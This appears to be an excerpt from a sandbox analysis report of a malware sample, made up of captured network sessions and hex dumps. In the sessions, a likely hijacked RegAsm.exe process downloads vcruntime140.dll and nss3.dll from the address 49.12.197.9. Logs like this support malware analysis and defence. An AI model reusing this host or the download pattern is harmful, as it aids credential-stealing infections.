2024-10-02 07:41:56 UTC	16384	IN	Data Raw: f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 Data Ascii: ^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49788	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:57 UTC	200	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:57 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:57 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:57 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:57 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-10-02 07:41:57 UTC	16384	IN	Data Raw: 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-10-02 07:41:57 UTC	16384	IN	Data Raw: 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-10-02 07:41:57 UTC	16384	IN	Data Raw: 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-10-02 07:41:57 UTC	15606	IN	Data Raw: 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 Data Ascii: NT@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49789	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:58 UTC	192	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:59 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:58 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:58 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:59 UTC	16120	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b Data Ascii: hRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e Data Ascii: w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 Data Ascii: $%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 Data Ascii: Fd8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-10-02 07:41:59 UTC	16384	IN	Data Raw: e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-M
